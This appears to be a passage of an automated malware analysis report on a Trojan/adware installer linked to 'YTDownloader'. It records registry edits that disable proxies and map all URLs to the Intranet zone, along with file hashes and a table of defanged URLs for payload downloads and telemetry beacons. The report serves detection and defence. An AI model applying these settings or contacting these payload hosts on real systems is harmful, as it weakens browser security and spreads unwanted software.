"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 35 01 5E B1 44 EA A6 72 18 E3 87 E9 B7 57 48"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:2164 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C D4 5A C6 DF F6 31 AB DC 89 B0 C7 E5 D1 C3 3B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:2156 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 55 41 58 ED 9D 29 7F 16 08 ED 20 6B 76 E0 D9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:576 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 7C 30 10 16 74 2F EE 57 B0 A6 D5 79 54 4F A4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"My Video" = ""
[HKLM\SOFTWARE\YTDownloader\Success]
"Install" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"
"MaxConnectionsPer1_0Server" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\YTDownloader\Success]
"InstallStr" = "ok"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE DC F0 77 B0 F4 18 B7 3C 37 F8 3E 22 3F 8F AB"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
The Trojan modifies IE security zone settings to map all local web nodes whose names contain no dots, and which are not assigned to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process BROWSE~2.EXE:3668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 6E 31 4B B4 2D 40 5A 51 08 F1 11 F8 34 46 22"
Dropped PE files
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name:
Product Version: 2.8.0.999
Legal Copyright: Copyright (C) 2014
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.8.0.999
File Description:
Comments:
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 870447 | 870912 | 4.35099 | 3a7c1eb4c9b2cdfb30bb1c53ad894eec |
| .rdata | 876544 | 259988 | 260096 | 3.0043 | 0d00c98c802818cc0883b166dd7b7a2d |
| .data | 1138688 | 25064 | 12800 | 3.17932 | dd02da31032a31ccb95103c7fa7b72cc |
| .rsrc | 1167360 | 244152 | 244224 | 4.40217 | 423050c37f2434333c9c9e1793d8f4d2 |
| .reloc | 1413120 | 42976 | 43008 | 4.59394 | d9d5899069fdc75bff6a2d73afe4621b |
URLs
| hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/2377.ashx?e=Qoli4LW15gtnA3VLGqrT9TI/Pi8VB4hYaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLkUIHBGIcHxHiq/Ldpfbs/YBTqgRg0M9kCy5U1DKQBR/1HrjuYPfZlNCUHeR8YCF3LiBTRxnKNddi1CRp07F4ZRCubuqRAnTtUsYja0YwBmQQeWksviRUhVmw7YhFSbRLh8h5o3YrXrbLSflwInKoSsTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5emS9jXjFgnw= | |
| hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=1729&action=na&ms_vr=3&clock=16&rnd=23400 | |
| hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=803&action=na&ms_vr=3&clock=0&rnd=23400 | |
| hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=10&n=ms_started&rnd=14220 | |
| hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=10&n=ms_started&rnd=14220 | |
| hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=20&n=ms_start_download&rnd=916 | |
| hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=20&n=ms_start_download&rnd=916 | |
| hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_b | |
| hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_d | |
| hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_c | |
| hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_e | |
| hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_a | |
| hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_b | |
| hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_c | |
| hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_e | |
| hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_a | |
| hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_d | |
| hxxp://www.ytdownloader.com/app/ping.ashx?action=S_INSTALL&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&rnd=27944&v=1.0.8654.1177&url=&title=&pingtext=Files& protocol=&size=0&ref=&browser= | |
| hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=30&n=ms_download_success&rnd=17999 | |
| hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=uWabAt9SLcwLjT49fHfOTNDx0QK0tujFjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF8PMHri1e7C9NPJ5v96kxwbVWTFo Vb8YXwF8xC533FcDPI5dGTWg7/48CMVjnZqYc8xmpxiLTPoz9GdXwkjcG2M0isR26F8c7K4ihqKSxe0jgb6v7cXpPt vCrCw4vHoxi6nXHFmzl4UJIhz0JUpzEfEpjPND7Tv589gkZhC35q9md5CSrcUCSh4vJSfGWeuF gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBfDzB64tXuwvTTyeb/epMcG1VkxaPlW/GE= | |
| hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=1ZEnpGuz/IQqQvvNc0/QxKGNjjUHyQp W1tgKrNy38lA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTQ6SaxLQh/qxWOvghCBTr/XvKbjUyzCCcFAL52sIXt4V mdZi2lOgm uz5FUTyZHqZLRunpF04Gnp31AH4wbxjJRF10/JyN4cjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVei4GUPP3zmQok4Z/T4OvkuHPbyEzOU1sA== | |
| hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=30&n=ms_download_success&rnd=17999 | |
| hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=1ZEnpGuz/IQqQvvNc0/QxKGNjjUHyQp W1tgKrNy38lA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTQ6SaxLQh/qwXCfGg4gcTppNB3Tmp8 xhs IILilpWF0OiEhuPxDpVo0KXYjr4isejZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVei4GUPP3zmQok4Z/T4OvkuHPbyEzOU1sA== | |
| hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=35&n=ms_about_to_exc&rnd=28949 | |
| hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=LCnUzM5l8JJsK0lFUFVJ7zyMpz1Liwuq0mXIKGF6Fg9XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKBTIpR gV745zbBYCuaAtAuRQgcEYhwfEYgZF 0Xr0ySxfX6JWT60I15ewo25xH dugxP4Tpn7X9BPEhRyyBD7ADYwDanr6NLtqQCm9ETKWdXr6MSN5TWO9FMoEMJ/sprmNd3ZXUTzY 8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNmhyT5r/ybNC1vKV8e/iGN5/nnDBjhbCFLZWhEyhE6oA== | |
| hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=35&n=ms_about_to_exc&rnd=28949 | |
| hxxp://errors.crossrider.com/utility.gif?error=mem_strt&report=mini_s&ver=803&action=na&ms_vr=3&clock=4703&rnd=8361 | |
| hxxp://errors.crossrider.com/utility.gif?error=mem_strt&report=mini_s&ver=1729&action=na&ms_vr=3&clock=5110&rnd=8361 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1438402673 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1438402674 | |
| hxxp://ipgeoapi.com/ | |
| hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=70299&appver=0&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_90&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1438402673&procruntime=7&rnd=1438402680 | |
